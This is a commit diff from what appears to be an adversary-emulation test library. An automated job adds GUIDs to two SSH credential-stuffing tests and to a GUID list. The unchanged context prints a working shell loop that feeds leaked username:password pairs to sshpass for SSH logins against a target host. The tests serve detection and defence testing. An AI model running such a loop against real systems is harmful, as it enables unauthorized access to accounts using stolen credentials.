Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
This commit is contained in:
parent
707c970acc
commit
17eab72057
@@ -4,6 +4,7 @@ display_name: 'Brute Force: Credential Stuffing'
|
||||
|
||||
atomic_tests:
|
||||
- name: SSH Credential Stuffing From Linux
|
||||
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
|
||||
description: |
|
||||
Using username,password combination from a password dump to login over SSH.
|
||||
|
||||
@@ -33,6 +34,7 @@ atomic_tests:
|
||||
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
|
||||
|
||||
- name: SSH Credential Stuffing From MacOS
|
||||
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
|
||||
description: |
|
||||
Using username,password combination from a password dump to login over SSH.
|
||||
|
||||
|
||||
@@ -716,3 +716,5 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3
|
||||
8fd5a296-6772-4766-9991-ff4e92af7240
|
||||
7e91138a-8e74-456d-a007-973d67a0bb80
|
||||
437b2003-a20d-4ed8-834c-4964f24eec63
|
||||
4f08197a-2a8a-472d-9589-cd2895ef22ad
|
||||
d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
|
||||
|
||||
Reference in New Issue
Block a user